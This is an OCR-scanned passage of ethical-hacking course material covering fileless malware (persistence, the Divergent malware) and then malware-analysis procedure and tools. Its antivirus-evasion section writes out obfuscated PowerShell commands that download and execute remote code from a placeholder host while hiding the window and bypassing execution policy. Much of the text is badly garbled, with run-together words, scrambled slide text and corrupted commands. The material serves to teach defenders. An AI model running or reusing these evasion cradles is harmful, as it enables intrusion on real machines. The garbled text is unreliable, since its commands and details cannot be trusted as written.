ical andCountermensores
Mackin ©by E-Comel
Copyright
When the victim opens the email and clickson the malicious
link,the victim is
automatically
redirectedto a fakewebsite
suchas outdated Flash,
Thefake websitescans for vulnerabilitiesi n the system, to
triggerthe exploit
Now,the filelessmalwareexploits toolssuchas PowerShell
system to loadand run the
maliciouspayloadsi n memory.PowerShell
downloads the maliciouspayloads froma
remote command-and-control
server
keyis createdfor storingthe maliciousscripti n the victim's
TheAutoStart registry
system
to maintain persistence
Oncethe maliciouspayloadis injected,it stealscritical information,
performs
data
andalldata
cexfiltration,sends the to the attacker

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Persistencewith FilelessTechniques
Maintaining
‘hon o othermalware types,
compared lelessmalware
does
n ot use ik filesto spread
its infection
or

_achers
adopt
unique methods a s developing
such loadpoints
to restartinfectedpayloads
to malta

save
payload
_tackers the
tat for application
files,
malicious inside
theregistry holds
dat configuration, and

Persistencewith Fileless Techniques

Maintaining
Onceany malwareenters a system, server, or network,it remains intact for a longtime. Unlike
othermalware types,filelessmalwaredoesnot use diskfilesto spread its infectionor maintain
persistence. Therefore,attackersadoptunique methodssuchas developing load pointsto
restart infected payloads to maintainthe persistenceof filelessmalware. Attackers save the
maliciouspayload insidethe registrythat holdsdatafor configurations, application files,and
settings.After loading the maliciouscodeinto the systemregistry keys,thiscodeexecutes itself
with everysystem restart or whena certain shortcutfile is accidentally clicked.Attackerscan
alsoexploit the Windowstaskschedulerto activate scripts and run themat a specific time. The
scheduled taskactivates the malwareinsidethe registry at regular intervalsof time to spread
infectionsi n the system.
Attackerscan alsomaintain persistencebyexploiting
WMI,whichis designed to handlevarious
systemsand devicesin a network.Attackersstore the maliciousscriptsinsidethe WMI
andtheycan later run themusingWMI utilities.Then,
repository, the storedscripts
can further
exploit
the vulnerablesystems in a networkandspreadthe infection,

2 e-&
O
7.65:Maintaining
Figure with eles techniques
persistence

7
Module 964
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
 FilelessMalware

1\asoenoosa
verentis
ate off 9s most
on xeon
he efor he and ae
Divergent |
inte rey o math prec
an
ols Pushes

18
onthe

Malware

Fileless Malware
=
Divergent
Divergent is a typeof filelessmalwarethat exploits NodelS, whichis a programthat
executes JavaScriptoutsidethe browser. Using Divergentfilelessmalware,attackers
generate revenue by targeting corporatenetworksthrough click-fraudattacks.It
strongly
depends on the registry forthe execution andstorageof configuration data
Furthermore,it employs a keyi n the registry
to maintain persistence and exploit
the
PowerShell
to injectitselfinto the other processes
on the infected
machine.I f the
infected process is running with the required
privileges,
it exploits
WMI to gather
information relatedto antivirus softwaresuchas Windows Defenderinstalledon the
targetsystem. If WindowsDefenderis installedon the targetsystem,it automatically
disablesvarious components of WindowsDefender and WindowsUpdates. After
infectingthe system,i t bypasses UAC through CMSTP.exe (MicrosoftConnection
Manager andstealscriticalinformationfromthe victim through
ProfileInstaller) URLs.

Module
7 965
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
 Divergentsend €2_deacon_and_sleep
pr

Ipstrings dwordptr &

push

sipstring} ¢1psteing
eapstri
OFF78
Divergent_send_wiTP_request

Figure7.6:Screenshot
of Divergent
Someadditionalfilelessmalwareare as follows:
=

=
Astaroth
Backdoor
Nodersok
=
Vaporworm
njRatBackdoor
SodinokibiRansomware
KovterandPoweliks
Dridex:
Hancitor/Chanitor
SorebrectRansomware

Module
7 966
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
 FilelessMalware
Antivirus Obfuscation
Techniques
Bypass to

(a inet
spel
aces
character
comma)
ad sch seman Bete

Obfuscation
FilelessMalware
Techniques
Antivirus(Cont'd)
Bypass to

1Inserting
Double Quotez

tnethe
double
quote
argon this
Thecommandparser
ss

symbol smal san dine. tacks use concatenate macous

Fileless Malware ObfuscationTechniques to BypassAntivirus

Nowadays, filelessmalwareto perform
attackersare leveraging cyber-attacks
on target
as suchmalwarehidesitself from traditional antivirus solutions.Furthermore,
organization,
filelessmalwaredoesnot store anything
on the disk;
hence, difficultto detect,
it is extremely
suchattacks.In addition, attackersadoptvarious obfuscationtechniques
to keeptheir
activities hidden
‘malicious andundetectedforas long a s possible.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 techniques
Thevarious obfuscation usedbyfilelessmalwareto bypass
antivirus solutions
a re
discussedbelow:
InsertingCharacters
insert special
Attackers characterssuchas commas (,)andsemicolons
(;)between
maliciouscommandsand stringsto makewell-knowncommandsmore difficult to
detect.Thesespecial
characters as whitespace
are considered i n command.
characters
hence,
line arguments; theyare processedeasily.
Using
this technique,
attackersbreak
malicious to evadeparsingofmalicious
strings commandsbysignature-based solutions.
yiemd.exe,/c,;,echo;powershell.exe
-NoExit -exec bypass -nop
Invoke-Expreseion
(New-Object
System.Net.WebClient)
Séecho
exit .DownloadString
‘https:
//targetwebsite.com―)
Inserting
Parentheses
In general
scenarios,parenthesesare usedto improvethe readability
ofthecode, group
complexexpressions,and splitcommands, Whenparentheses are used,variablesof a
code blockare considered just as a single-line
and evaluated command.Attackers
exploit
thisfeatureto splitandobfuscatemaliciouscommands.
cmd.exe /e ((echo command1)
56
echo command2)
)
CaretSymbol
Inserting
(*)is generally
The caret symbol a reservedcharacterusedi n shellcommands
for
escaping.Attackersexploitthis feature to escape maliciouscommandsat execution
time, Forthis purpose,theyinsert single insidea malicious
or doublecaret symbols
command.
C:\WINDONS\system32\cnd.exe Je
PAO**WAAOMAEAASA*H*MOAAIAALA®.
nop AA@*°x%%@
— -
-NOM*EXit ~exec bypass
_Invoke-Expression (New-Object_ —_System.Net.WebClient)
-

(( //targetwebsite.com―)
DownloadString ‘https:
Whenthe abovecommandis executed,
&:echo,exit
the first caret symbol
is escaped

/c pro*we*r*s*h*e*1"1*.*e*x%e-
C:\WINDOWS\system32\cmd.exe
No*Exit exec bypass -nop_Invoke-Expression _(New-Object
‘System.Net.WebClient)
//targetwebsite.com―)
Downloadstring(( ‘https: exit
&£echo,
After the secondcaret symbol
is also escaped,
powershell.exe
is executedwith a
‘command-line
argument:
C:\WINDOWS\system32\cmd.exe
/c powershell.exe -NoExit -exec
bypass-nop Invoke-Expression(New-Object System.Net.WebClient)
(( ‘https:
Downloadstring &£echo,exit
//targetwebsite-com―)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 DoubleQuotes
Inserting
Whena commandis embeddedwith double quotes,i t does not affect the normal
Furthermore,
execution of the command. the command-line
parseruses a doublequote
symbol as an argumentdelimiter.Attackersuse doublequotesymbols to concatenate

malicious
commands
Pow""er―"Shell
in arguments.
-N’"oExit -ExecutionPolicy bypass -noprofile -

windowstyle hidden md /e Flower. jpg

CustomEnvironment Variables
Using
Anothermethodadopted by attackersto obfuscatefilelessmalwareis using
environment variables.In Windowsoperating environment variablesare
systems,
dynamic objectsthat store modifiablevaluesusedbyapplications
at run time. Attackers
exploitenvironment variablesto splitmaliciouscommandsinto multiplestrings.
Furthermore,
theyset the valuefor the environment variableat run time to execute
malicious
commands.
set a=Power Sésetb=Shell 6% ¥a:~0,-1%%bi -ExecutionPolicy bypass
vnoprofile -windowstyle hidden ond /c Products pdf
UsingPre-assigned
EnvironmentVariables
technique
‘Another exploited
byattackersis retrievingspecific
charactersfrom pre-
assigned suchas “CommonProgramFiles’.―
environment variables Thecharacters
in
suchvariablesare referred through
the indexand exploited
byattackersto execute
maliciouscommands.“3CommonProgramFiles%― contains a default value
"C:\Program Files\CommonFiles.― Specificcharactersfrom this value can be
indexing
through
accessed andusedto execute maliciouscommands as follows:
cmd.exe /c “SConmonProgramFiles:~3,ltowerShell.exe―
-windowstyle
hidden -conmand weeript myscript.vbe
Theabovecommandretrieves a single
character‘P’
at index3,whichis concatenated
with “owerShell.exe",
andexecutesthe maliciouscommand

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

@ Marware concpis Fietose Malware

Concopts
e MalwareAnalysis

©Fetanconcepts Ceuntroeatsres

e Virus and
Worm
Concepts Anti-MalwareSoftware

Malware Analysis
Malwareis a programdesigned
to perform activities (the
malicious term itselfis a contraction
software―).
of “malicious Malwaresuchas viruses, Trojans,worms, spyware, androotkitsallow
an attackerto breach security defenses andsubsequently launchattackso n targetsystems.
Thus,to find andfix existinginfectionsandthwart future attacks,
it is necessaryto perform
malwareanalysis.Many toolsandtechniques are available
to perform suchtasks.
Thissection explains
the malwareanalysis
procedure
and discusses
the various toolsusedto
accomplish
it.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 What is Sheep
DipComputer?

Asheepof
1©sheep
dipping
referstothe analysissuspect
ls, incoming etc. formalware
messages,
(© dipcomputer isinsaled
network
monitors,
with portmonitors,file monitors,
andconnectstoa network onlyunderstrelycontrolled conditions
andantvieussoftware

Sheep
DippingProcessTasks
fun usergroup andprocessmonitors
permission,

fun device
devera ndfe monitors

fun
an
registry kernelmonitors

Whatis Sheep
DipComputer?
Sheep
dipping
is a process used i n sheep farming,wherebysheep a re dipped i n chemical
solutionsto makethemparasite-free. In information andmalwareanalysis,
security sheep
dippingrefersto the analysis
of suspiciousfiles,incomingmessages,
etc.,for malware.
Theusers isolatethe sheep-dipped
computer fromother computers on the networkto block
any malware
all
from
entering Beforeperforming
the system. this process,it is important
downloadedprograms on externalmediasuchas CD-ROMs
to save

orDVDs.
A computerusedfor sheep dippingshouldhavetoolssuchas portmonitors,files monitors,
network monitors,and one or more antivirus programsfor performing
malwareanalysis
of
files,applications,
incomingmessages, externalhardwaredevices(suchas USBand pendrive),
andso on.
Sometasksthat are typically
run during
the sheep
dipping a re as follows:
process
+
Runuser,group permission,andprocessmonitors
+
Run portandnetworkmonitors
+
Rundevice
Runregistry
driver andfilemonitors
andkernelmonitors

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Antivirus SensorSystems

computer
sofware
1@An antveussensor estemie colectonof thatde 5
andanalyes malicious
code

‘Network Antivirus System

@ &

Antivirus SensorSystems
‘An softwarethat detectsand analyzes
antivirus sensor systemis a collectionof computer
malicious codethreatssuchas viruses, worms, andTrojans.It is usedalong
with sheep
dip
computers.

Network Antivirus System

S-e OQ&
i Tiana net

al ary
wh

Figure7.67:
Screenshotdisplaying
of Sensor
the workingAntivus System

7
Module 972
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
 Introductionto MalwareAnalysis

Wy
States
Analyst
Teamsters
Te

Tote
eerietet
of
temas mace tne

ee ofan
Dynami
Aras sivas

rly

beperformed
‘amia nalyses to obtain
2

Introduction to Malware Analysis

Attackersuse sophisticated malwaretechniques
as cyber-weapons to stealsensitive data.The
malware c an inflictintellectual
andfinancial
losseso n the target,regardless
ofwhetheri t is an
individual,a group of people, Moreover,
or an organization. it spreadsfrom one systemto
anotherwitheaseandstealth.
Malwareanalysis is a processof reverse engineeringa specificpieceofmalware to determine
its origin, functionality,
andpotential impact.Byperforming malwareanalysis, one can extract
detailedinformation aboutthe malware.Malware analysis partof anypenetration
is an integral
testingprocess,
WhyMalwareAnalysis?
Theprimaryobjectives
ofanalyzing programare asfollows:
a malicious

happened
Determine whatexactly
Determine

=
Identify
the
malicious
intent
indicatorsof compromise
of the malware

Determine the complexity

levelof an intruder
Identify
theexploited
vulnerability
Identify the extent of damage
responsible
Catchthe perpetrator
by
caused theintrusion
for installing
themalware
Findsignatures
for hostandnetwork-based
intrusion detectionsystems
Evaluatethe harmfroman intrusion

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Listthe indicators
ofcompromise fordifferentmachines
anddifferent
malware
programs
‘=
Findthe systemvulnerability
that the malwarehasexploited
‘=
Distinguish
the gatecrasher responsible
or insider forthemalware
entry
Themost common business answeredbymalwareanalysis
questions are as follows:
‘=

=
What
is
t
did
How
he
intention
t
of
hrough?
it get
the malware?

‘=

=
What
is impacton thebusiness?
ts
they?,andhowgood
Whoare the perpetrators, a re
=

=
to
How abolishthe malware?

What are the losses?

=
long
How hasthe system
beeninfected?
‘=

‘=
Whatofis the medium the malware?
Whatare the preventive
measures?
Guidelinesfor MalwareAnalysis
Thefollowing
guidelines
are to be adopted
whileperforming
malwareanalysis:
During malwareanalysis,payattention to theessentialfeaturesinsteadof
every
detail
understanding
Trydifferenttoolsandapproaches
to analyze the malware, as a single
approach
may
not beuseful

Identify,
=

‘Types
analysis
prevention
techniques
of MalwareAnalysis
anddefeatn ew malware
understand,

Thetwo typesof malwareanalysis

basedon the approach
methodology:
static analysis
and
dynamic
analysis.
Static MalwareAnalysis.
It is alsoknownas codeanalysis, and it involvesgoing throughthe executablebinary
codewithout actually executingit to gaina betterunderstanding ofthemalware and its
purpose,
Thegeneral involvesanalysis
static scrutiny of the malwarewithout executingthe code
or instructions. The processinvolvesthe use of differenttoolsandtechniques to
determinethe maliciouspartof a program or file. It also gathers informationabout
malware functionalityand collects thetechnical pointersor simplesignaturesthatthe
malwaregenerates. Suchpointersinclude filename, MDSchecksums or hashes,file
type,
file
size.
and

ical andCountermensores
Mackin ©by E-Comel
Copyright
 DynamicMalwareAnalysis
It alsoknownas behavioralanalysis,
is and it involvesexecutingthe malwarecodeto
knowhow it interacts with the hostsystemas well as its impact
on the hostsystemafter
it infectsthe system,
Dynamic
analysis
involvesthe execution of malwareto examine its conductand
operations,andit identifiestechnicalsignatures thatconfirmthe malicious intent. It
revealsinformationsuchas domainnames,file pathlocations, createdregistrykeys,IP
addresses,additional
files,installation
files,DLL,and linkedfileslocatedon the system
or network,
Bothtechniques howthe malwareworks,but theydiffer i n terms of the
aim to understand
toolsusedas wellas thetime andskillsrequired
forperformingtheanalysis.
It is recommended
that both static and dynamicanalyses be performed
to gain a deeper
understanding of the
functionality
ofmalware.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 MalwareAnalysis
Procedure:Preparing
Testbed

|
Step1 Allocate
a physical fortheanalysis ab
system

2|
Step
machine
(viwore,
nsalla Vitual Hyper e t onthe syst

|
Stop3 on inthe Vitwa machines)
Insallguest0S

| late
Stop4
system in
the rom thenetwork ensuringthat the NI aris “host mode
any―

Step
| Simulate
internetservices usingtools
s cha NetSim

Step
| “shared
folders"
“,uest
lation’
_Otable
the and

| install
Step?
maware analysis
tool

|
Stop8 GeneratethehashvalueofeachOSandtoo

|
Step9 malware
_Copythe over tothegest OS

Malware Analysis
Procedure
Malwareanalysis
provides
an in-depth
understanding
of eachsample
and identifiesemerging
technology ofmalwaresamples
trendsfroma vast collection withoutactually them.
executing
Themalwaresamplesare mostly
compatible
with the Windowsbinary
executable.Thereare
objectives
various for performing
malwareanalysis.
It is extremely
dangerous malwareo n production
to analyze devices connectedto production
networks.Therefore,o ne shouldalways
analyzemalwaresamples
i n a testing
environment on
an isolated
network.
Malware
1.
analysis
involves
the steps:
Preparing
Testbed
following

2.
3.
Static
Analysis
Analysis
Dynamic
Preparing
Testhed
to builda testbed:
Requirements
+

=
Target
your
Anisolatedtest networkto host
machines
testbedand isolatednetworkservices suchas DNS
installedwith a varietyof OSand configuration states (non-patched,
patched, etc.)
Virtualizationsnapshotsand re-imagingtools to wipe and rebuildthe targetmachine
quickly
for
Sometoolsare requiredtesting.Theimportant ones are listedbelow:

ical andCountermensores
Mackin ©by E-Comel
Copyright
 tool:Togeta cleanimageforforensics
Imaging andprosecution
purposes.
File/data
analysis:
To perform staticanalysis
of potential
malwarefiles.
Registry/configuration
tools: Malware infectsthe Windowsregistryand other
configuration
variables.Thesetoolshelpto identify
thelastsavedsettings.
To perform
‘Sandbox: dynamic
analysis
manually.
Loganalyzers:
Thedevicesunderattackrecordthe activities of the malwareand
logfiles.Thesetoolsare usedto extractthelogfiles.
generate
© Networkcapture: Tounderstandhowthemalwareleverages thenetwork
Steps
to preparethe testbed:
+
Step4:Allocatea physical system for the analysislab
+
step2: installavirtualmachine(VMware, Hyper-V, etc.)o n the system
+
Step 3: Install
guest O Son thevirtual machine(s)
Step 4: Isolatethesystem fromthenetworkbyensuringthatthe NICcardis in the“host
only―
mode
Step 5: Simulate Internetservices usingtoolssuchas INetSim (https://www.inetsim.org)
Step 6: Disable“sharedfolders―
and“guest
isolation―

7:
Step Install malware
analysis
tools
Step
‘=

8:
Generate the hashvalueof
Step 9: Copythe malwareto the guest
eachOSandtool
OS
Tools
‘Supporting forMalware Analysis:
Somesupporting toolsrequired to perform malwareanalysis are asfollows:
Virtual MachinesTools:
=
(https://docs.microsoft.com)
Hyper-V
*
ParallelsDesktop
14 (https://www.parallels.com)
+
(https://www.apple.com)
Boot Camp
+
VMwareWorkstationPro(https://www.vmware.com)
ScreenCapture
andRecording
Tools:
=
(https://www.techsmith.com)
Snagit
+
(hteps://wow.techsmith.com)
Jing
*
(https://www.techsmith.com)
Camtasia
+
Exvid(https://www.e2vid.com)

ical andCountermensores
Mackin ©by E-Comel
Copyright
NetworkandInternet Simulation
Tools:
+
NetsimPro(https://tetcos.com)
=
ns-3(https://www.nsnam.org)
+
RiverbedModeler(htip://www-riverbed.com)
*
QualNet
(http://web.scalable-networks.com)
0 Backup
and ImagingTools:
=
GenieBackup
Manager Pro(https://www.zoolz.com)
=
Macrium ReflectServer(https://www.macrium.com)
=
(https://www.drive-image.com)
R-Drive Image
14(https://www.00-software.com)
(0&0Diskimage

Modul
7Page
978
tical
Making
and by
CountermensoresCopyright©
Comet
 StaticMalwareAnalysis

of
1@In static anys, we donotrun the Some the static malwareanalysis
techniques:

i determine
employs
(ulely © one
different

maliciousmatware
caning
toolsa ndtechniques
fa fe s
to
Loeatand

e
information
aboutthemalware
Performing
stingsearch

Pecan etna epenences C)Identiti methods

packng/obfucation
Ieee
©Frog e portable
xeatbles(P]normation

te
©seeniving dependencies
@ watvarecsassomby

StaticMalware Analysis
Staticanalysis is the process an executable
of investigating filewithout runningor installingit
Thus,itis safeto conductstaticanalysis becausethe investigator
doesnot installor execute the
suspicious file.However, some malware doesnot needinstallationfor performing malicious
activities. Therefore, shouldperform
investigators static analysis
in a controlledenvironment,
Staticanalysis involvesaccessing the source code or binary
codeto find the data structures,
function calls,call graphs, etc., that can represent maliciousbehavior.Investigatorscan use
various tools to analyze binary code to understandthe file architectureand impacto n the
system, Compiling the source codeof a systeminto a binary executableresultsi n data loss,
whichmakesthe analysis of the code more difficult.Analyzing the binary code provides
information about the malwarefunctionality, its network signatures, exploitpackaging
technique, involved,
dependencies ete.
The procedure of examininga givenbinary withoutexecuting i t is mostly
manual.It requires
the extraction of vital data,
suchas datastructures,utilizedfunctions, andcallgraphs,
fromthe
malicious file.Thisdatacannot beviewedbyinvestigator afterprogramcompilation,
Somestatic malware analysistechniques
are listedbelow:
=

File
Local
fingerprinting
scanning
andonlinemalware
‘=

Performing
Identifying
search
strings
packing/obfuscationmethods
Finding portable
the (PE)
executables information
Identifyingdependencies
file
Malwaredisassembly

ical andCountermensores
Mackin ©by E-Comel
Copyright
 StaticMalwareAnalysis:
File Fingerprinting
(©Fle fingerprinting
isthe proces of computing the hashal e for a givenbinary
code

use
1@ Youcan the computed
‘made
tothebinary
hash
codeduring
(©Usetoo ke HashMyfiles
valuet o uniquely
analysis
to calculate
dently themalwarea periodlalyerty any changes
various hash a les ofthemalwarele
are

Hashes
proses
the
hath
valve
of fle woe MOS,
Fite Fingerprinting

Mura hes //tho com)

Tools
Hasta (hep//impbscom)
Haale psn ovsofcom)

hashdeep
(htos/soureforge
net)

Dossms (tame tolset

File Fingerprinting
Filefingerprinting
is a process of computingthe hashvaluefor a given binary codeto identify
andtrackdataacrossa network.Thisprocessincludes thecalculation of cryptographichashes
of the binary code to recognizeits function and compareit with other binary code and
programsfrom previous scenarios. Thecomputed hashvaluecan be usedto uniquely identify
themalwareor periodically verifyif anychangesare madeto the binarycodeduring analysis.
Thesefingerprints are used to track and identify similar programs from a database.
Fingerprintingdoesnot workforcertain recordtypes, encrypted
including or password-secured
files,images, audio,and video,whichhavedifferent content compared to the predefined
fingerprint.
Message-Digest 5 (MDS)
Algorithm and SecureHashAlgorithm 1 (SHA-1)are the most
commonly
Usedto create a fingerprint
GUL-based
ofthe tools
usedhashfunctionsfor malwareanalysis.
suspicious
Various suchas HashMyfiles
file as partofthe static analysis.
tool that can calculatevarious hashvalues.
can be
HashMyFiles is a

=
HashMyFiles
Source:https://www.nirsoft.net
HashMyFilesproducesa hashvaluefor a file usingMDS, SHA1, CRC32,SHA-256, SHA-
512,and SHA-384algorithms. The program also provides informationabout the file,
suchas thefull path
of the file,date of creation,date of modification,
file size, file
attributes, which helpsi n searching
file version, and extension, for and comparing
similarfiles.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 of HashMyfiles
7.58:Screenshot
Figure
Someadditionalfile fingerprinting
toolsare as follows:
+
Mimikatz(https://github.com)
+
(http://implbits.com)
Hashtab
+
(https://www.slavasoft.com)
HashCale
hashdeep
(https://github.com)
MbSsums(http://www.pc-tools.net)
 StaticMalware Analysis:
Local and Online Malware Scanning
|@ Scanthe
‘ptocnte
antebinary
code
locally
wel
known ang
sere
and Spores
soware andi Virwetoal |
‘stot afte that
nas
aves
he

You
can ale load thecadet o otinewebs ich
2 Vieurotl opt seanned bya widearetyof

{Local
and Tools
b d Ans
OnlineMalwareSeanning
p/m yond oncom)

‘Local
andOnline Malware Scanning
Youcan scan the binary
codelocally
using well-knownandup-to-date
antivirus software.If the
codeunderanalysis it may havealready
of a well-knownmalware,
is a component been
discoveredand documentedbymany antivirus vendors.You can also upload the code to
bya widevarietyof scan engines.
suchas VirusTotalto getit scanned
‘websites
the hashvaluesof a suspicious
VirusTotalcalculates file and comparesthemwith onlineand
offline malwaredatabasesto determinethe existenceof the recognizedmaliciouscode.This
processsimplifies by offering
further investigation deeper insightsinto the code,its
functionality,other
=
andessential
VirusTotal
details.

Source:https://www.virustotal.com
VirusTotal
is a free service that analyzes suspiciousfilesand URLs.In addition,i t
facilitatesthe detectionof viruses, worms, Trojans, a reportthat
etc. It generates
provides the total numberof enginesthat markedthefile as malicious, the malware
name, and, if available,additionalinformationaboutthe malware.
It alsooffers important detailsof the online file analysis,
suchas targetmachine,
compilation timestamp, typeof file,compatible entrypoint,PEsections,
processors,
datalinklibraries(DLLs), usedPEresources,differenthashvalues, IP addresses
accessed
or containedi n the file,programcode, andtypeofconnectionsestablished.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 7.69:
Figure
of ScreenshotVrusTota
Someadditionallocalandonlinemalwarescanning
toolsare as follows:
=
Hybrid (https://www.hybrid-analysis.com)
Analysis
=
CuckooSandbox(https://cuckoosandbox.org)
=
Jotti (https://virusscan
jotti.org)
Valkyrie
Sandbox(https://valkyrie.comodo.com)
OnlineScanner(https://www
fortiguard.com)
 asto
entrat
embeded
(@Usetoo such inex rom
strings

String Searching Tools

stones
©
com toon

1 ese co
hes/owmcesec

Performing Search
Strings
Softwareprograms includesome stringsthat are commands for performing
specific
functions
such
as
printing
output.
memoryor cookie data,
communicate information
Strings
the maliciousintent of a program,suchas reading
existingstringscan represent
embedded i n the compiledbinarycode.
to
fromtheprogram its user. Various
the internal

Searching
through about the basicfunctionality
information
the stringscan provide of any
program. During malwareanalysis, searchfor the maliciousstringto determinethe harmful
actions that a programcan perform. For instance,i fthe programaccessesa URL,i t will have
that particularURLstringstoredi n it. It is advisableto bealertwhile lookingfor strings
andalso
for
search theembedded andencrypted
Usetoolssuchas BinTextto extract embeddedstrings
file.
to detectthe suspicious
strings
fromexecutablefiles.Ensurethat the
tool can scan and displayASCIIand Unicodestrings as well. Sometools can extract all the
strings andcopythemto a text or documentfile.Usesuchtoolsto copythe strings
to a text file
to ease
=
the
taskof searching
BinText
for
malicious
strings.
Source:https://www.aldeid.com
BinTexti s a text extractor thatcan extract text fromanyfile.It can findplain
ASCIItext,
Unicodetext, andresource strings, providing usefulinformationfor eachitem.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 T Bintext303
| |[EWser\TesiDesitopwikiwam
Seach Fer
| Heb

Floto
scan ove Biome | [Go
Advanced
[File
view
taken:
[Mempos. [rea Text
747(07
Time 0.000cece sie byte
a

n
pos
‘A
onooo9n00040on000400040 TThis cannotb ewn DOS
program made
4 oogo00000178
000900400178
‘A
data

“A
oogooon001A0
on09004001A0 tent
oooo00n00;c8
—onoooo4anics ‘data

hilop
“A
ooooonn00208
000000401008 hip.e n kid iklSpecitRandom
‘A
oogoonn00234
on0g00401034
A oooo00nn02s¢
on00oo4arO5C
4 oooo0n000202
oodd004n1002
ovnosded
o1/W/index
php
enecut
ke
‘<body
ilestacton

22 ‘ehode'
ONLOAD="vindow
et document

port
©
A oogoonn00322
on0g04ar
‘A
actor

“4 on0o004aT
1A,
oooo00n00340
on00040r140 SOFTWARE
Wierosot\Windowe\CutertVeson
ProgantesDi
on00004arTo
oooo00n00364
A oogoo0n002AF TAF \Irteret Expoespero
‘A
oogo00nn0se7
_onogo04a2007 ‘Awokbv Second
Pat Hel
\<
Reed —_||AN
40 50

Figure
7.70:Screenshot
of BinText

Someadditionalstringsearching
toolsare as follows:
FLOSS (https://www
fireeye.com)
(https://docs.microsoft.com)
‘Strings
Free EXEDLLResource Extract(http://www.
resourceextract.com)
(https://wwwfileseek.ca)
FileSeek
HexWorkshop (http://www.
hexworkshop.com)

Modul
7 985
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
 StaticMalware Analysis:
Identifying
Packing/Obfuscation
Methods

(©
atuchers
use
packers
compress,
often
encryptor modiyamalware
to
executable
fle
PELa

signatures
Te PIOtoolprovides
des bouttheWindowsenecuable
to oid detection fest can deny asacited withove 600

log andother metadatava state snalys

Usetool sucha s Eid thatd etect most
amen packers, cryptrs andcompilers
for

(© Tools
Packaging/Obfuscation
Mocro_Pack
tas/ihut.com)
©

1 thu
UPKhps//upe
ASPockhtn//maospackcom)
io)

Identifying Methods
Packing/Obfuscation
Attackersuse packing andobfuscationto compress,encrypt, or modify a malwareexecutable
file to avoiddetection.
Obfuscation alsohidesthe execution of the programs.Whenthe user
executesa packed program,it alsoruns a smallwrapperprogramto decompress the packed file
andthenrun the unpacked file. Thiscomplicates
reverse engineers’attempts to find out the
actualprogramlogic andothermetadatavia staticanalysis.
You shouldtry to determineif the file includespacked elementsand alsolocatethe tool or
methodusedforpacking it. Usetoolssuchas PEId,whichdetectsmost commonly usedpackers,
cryptors, andcompilersfor PEexecutablefiles.Finding the packer will ease the taskof selecting
a toolfor
=
unpackingcode.
PEID
the
Source:https://www.aldeid.com
PEIDis a free tool that provides
detailsaboutWindowsexecutablefiles. It can identify
signaturesassociatedwith over 600 differentpackers and compilers. Thistool also
displaysthe typeof packers usedfor packing
the program. It also displays
additional
EPsection,andsubsystem
detailssuchas entrypoint,fle offset, usedforpacking,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Bre wss -

x
Fle:
[EOSH
ods
\OBWvii
Mode
Malware
[a]O7 TreaWrusesWlezVeust.

Entypont: [00008458

Fle
Offeet: [00008859
BP Section: [text

[55,886C,60 [>]
FestOytes:
ES]
Unkerinfo: [60 Subsystem:
[Waza [3]

|Tek
vener
assean |

Fstayon
top
| |_Optens

packaging/obfuscation
Someadditional toolsare as follows:
=

=
Macro_Pack
(https://github.com)
(https://upx.github.io)
UPX
(http://www.aspack.com)
ASPack

ical andCountermensores
Mackin ©by E-Comel
Copyright
 StaticMalware Analysis: the PortableExecutables
Finding
(PE) Information

PEExplorer

IieWindowsexecataleie types(ta eed Pefe) rangingrom

© Extraction
Portable
PE
tecuuble
Tools
Seanez

the PortableExecutables(PE)
Finding Information
(PE)
ThePortableExecutable format is an executablefile formatusedon WindowsOS,
which
stores the information
that a Windows systemrequiresto managethe executable code.It
stores metadataabout the program,whichhelps i n finding
additionaldetailsof the fil. For
instance, the Windowsbinary is i n PEformat,andit consistsof informationsuchas time of
creation and modification,importand exportfunctions, compilation time,DLLs, linked files,
strings,menus,andsymbols. ThePEformat contains a headerandsections that store metadata
about
the in
a n
ofacontains
ThePE
following
file andcodemapping

sections:
file the
OS.

instructions
‘=

the
‘+
text: Contains

well
andprogramcodethat the CPUexecutes.
rdata:Contains importandexportinformation as as otherread-onlydata used
bythe program.
-data:Containsthe program's
global
data,
whichthe system can access fromanywhere

Consistsof the resources employed

_rsre: bythe executable,such as icons, images,

Youcan
menus,and
strings,additional
asthis sectionoffers
the headerinformationto gather
use
multi-lingual
support.
detailsofa file or program, suchas its
features.
Youcan use toolssuchas PEViewto extract theabove-mentioned information.
+
PEExplorer
Source:http://www.heaventools.com
PEExplorerlets you open, view, and edit a varietyof 32-bitWindowsexecutablefile
types(also
calledPEfiles)rangingfromcommon types,suchas EXE, DLL,andActiveX

ical andCountermensores
Mackin ©by E-Comel
Copyright
 types,suchas SCR(Screensavers),
to lessfamiliar
Controls, CPL(Control
PanelApplets),
SYS,
MSSTYLES, and more (including
BPL,DPL, executablefiles that run on the MS
Mobileplatform).
Windows

772:of
Figure Screnshat PEExplorer
SomeadditionalP Eextraction toolsare as follows:
=
PortableExecutable (https://tzworks.net)
(pescan)
Scanner
=
Resource (http://www.angusj.com)
Hacker
=
(https://www.aldeid.com)
PEView

ical andCountermensores
Mackin ©by E-Comel
Copyright
 StaticMalwareAnalysis: File Dependencies
Identifying
(©
watk
with
internal
toDependency
Prograneedto
oeton
propery Dependency
Walker
Walker of
an ystems
stall thedependent
fle ondbudsMerarchal
ree eagrams
modules
ao records
ereutable
the

Check
inked
Istohe dynamical the mare

as
Dependency
Walker
stots such oer the

1 Dependency
To
Otes/ermylong
nck
Depengeny
Checking
thu

ki tee oti

File Dependencies
Identifying
Anysoftwareprogram depends on various inbuilt librariesof a n OSthat help i n performing
specified actions in a system. Programs needto workwith internalsystem filesto function
correctly. They store the importand exportfunctionsin a kernel32.dllfile, Filedependencies
contain information aboutthe internal system files that the programneedsto function
properly, the process of registration,
andlocationon themachine.
You needto find the librariesandfile dependencies, as theycontain informationaboutthe run-
time requirements of an application.Subsequently, you needto checkif theycan findand
